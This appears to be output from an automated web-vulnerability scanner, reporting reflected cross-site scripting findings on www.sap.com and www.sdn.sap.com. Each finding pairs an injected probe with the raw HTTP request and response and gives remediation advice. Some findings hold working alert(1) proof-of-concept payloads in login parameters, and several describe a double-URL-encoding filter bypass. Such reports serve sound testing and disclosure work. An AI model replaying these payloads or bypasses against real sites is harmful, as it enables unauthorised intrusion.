The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d57fe'%3bba8521573e5 was submitted in the REST URL parameter 1. This input was echoed as d57fe';ba8521573e5 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e15c9'%3bf8dfd0a7e53 was submitted in the REST URL parameter 1. This input was echoed as e15c9';f8dfd0a7e53 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c4fe'%3b078b4ba85dc was submitted in the REST URL parameter 1. This input was echoed as 3c4fe';078b4ba85dc in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34191'%3b4a807e85877 was submitted in the REST URL parameter 1. This input was echoed as 34191';4a807e85877 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde53'%3b04827bcf38e was submitted in the REST URL parameter 1. This input was echoed as cde53';04827bcf38e in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81ac5'%3bfaef581bb5b was submitted in the REST URL parameter 1. This input was echoed as 81ac5';faef581bb5b in the application's response.
Request
GET /global81ac5'%3bfaef581bb5b/unified/css/StageHeaderMainFooter.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34346
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global81ac5';faef581bb5b';
var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd56'%3b4de52bd1857 was submitted in the REST URL parameter 1. This input was echoed as 9cd56';4de52bd1857 in the application's response.
Request
GET /gwtservices9cd56'%3b4de52bd1857/httpBridge.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9087
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:24 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:24 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='gwtservices9cd56';4de52bd1857';
var DOCUMENTNAME='Bridge';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b521'%3b890d1e3b86c was submitted in the REST URL parameter 1. This input was echoed as 9b521';890d1e3b86c in the application's response.
Request
GET /news-reader9b521'%3b890d1e3b86c/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34066
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:47 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:47 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='news-reader9b521';890d1e3b86c';
var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d4a0'%3b2ee006ae78a was submitted in the REST URL parameter 1. This input was echoed as 3d4a0';2ee006ae78a in the application's response.
Request
GET /print3d4a0'%3b2ee006ae78a/global/ui/css/sapcom_countryselector.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='print3d4a0';2ee006ae78a';
var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82dcd%2522a%253d%2522b%25221a0efd74c47 was submitted in the REST URL parameter 1. This input was echoed as 82dcd"a="b"1a0efd74c47 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /sitemap.aspx82dcd%2522a%253d%2522b%25221a0efd74c47 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34397
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:26 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a17e'%3b6316216be92 was submitted in the REST URL parameter 1. This input was echoed as 4a17e';6316216be92 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.aspx4a17e'%3b6316216be92 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34290
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:30 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:30 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:04:30 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='sitemap.epx4a17e';6316216be92?error=403&404;http:'; var DOCUMENTNAME='Error';
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885bd%2522a%253d%2522b%25226ba1d0ca90e was submitted in the REST URL parameter 2. This input was echoed as 885bd"a="b"6ba1d0ca90e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /social/index.aspx885bd%2522a%253d%2522b%25226ba1d0ca90e HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34396
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:08 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:08 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf7b%2522a%253d%2522b%25222f512cd22da was submitted in the REST URL parameter 3. This input was echoed as 3cf7b"a="b"2f512cd22da in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /solutions/mobility-solutions/index.epx3cf7b%2522a%253d%2522b%25222f512cd22da HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 40813
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:43 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:43 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d498'%3b6186584efbc was submitted in the REST URL parameter 1. This input was echoed as 7d498';6186584efbc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /text7d498'%3b6186584efbc/global/ui/css/sapcom_countryselector.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34369
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:30 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:30 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='text7d498';6186584efbc'; var DOCUMENTNAME='Error';
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe06%2522a%253d%2522b%2522cd34d5824cc was submitted in the REST URL parameter 3. This input was echoed as 8fe06"a="b"cd34d5824cc in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /usa/sme/index.epx8fe06%2522a%253d%2522b%2522cd34d5824cc HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 44413
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:50 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:50 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=smeipcheck=1; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c69b%2522a%253d%2522b%2522ffb1fd58d11 was submitted in the REST URL parameter 3. This input was echoed as 6c69b"a="b"ffb1fd58d11 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /usa/sme/index.epx%206c69b%2522a%253d%2522b%2522ffb1fd58d11 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 44407
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:56 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=smeipcheck=1; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c15b'%3bc3401e30041 was submitted in the REST URL parameter 1. This input was echoed as 1c15b';c3401e30041 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:10:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:10:40 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:10:40 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:10:40 GMT
Content-Length: 9370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='gwtservices1c15b';c3401e30041'; var DOCUMENTNAME='Bridge'; if(!ACTION) var ACTION; ACTION='03';
The value of the password request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2fdb'%3balert(1)//cf53a137865 was submitted in the password parameter. This input was echoed as f2fdb';alert(1)//cf53a137865 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the userid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1332'-alert(1)-'f09779bee1c was submitted in the userid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.143. http://www.sdn.sap.com/irj/scn/about [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/about
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d19a"><a>80170f92216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
SDN_RES_KEY: /webcontent/uuid/a89be75d-0501-0010-eb91-8b2638a2dde6
Expires: 0
Content-Length: 49406
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:17:16 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/about?6d19a"><a>80170f92216=1"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39fb5"><a%20b%3dc>8171187bc32 was submitted in the REST URL parameter 7. This input was echoed as 39fb5"><a b=c>8171187bc32 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a58c"><a%20b%3dc>958ec24ec72 was submitted in the REST URL parameter 8. This input was echoed as 9a58c"><a b=c>958ec24ec72 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6de3"><a%20b%3dc>04ea5cf79f2 was submitted in the REST URL parameter 9. This input was echoed as d6de3"><a b=c>04ea5cf79f2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the overridelayout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5efbd"><a>657bf3b1c69 was submitted in the overridelayout parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
SDN_RES_KEY: /library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4
Expires: 0
Content-Length: 37310
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:03 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true5efbd"><a>657bf3b1c69"> ...[SNIP]...
The value of the overridelayout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be526"><a>f01ad06b3c6 was submitted in the overridelayout parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
SDN_RES_KEY: /library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4
Expires: 0
Content-Length: 39084
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:05 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
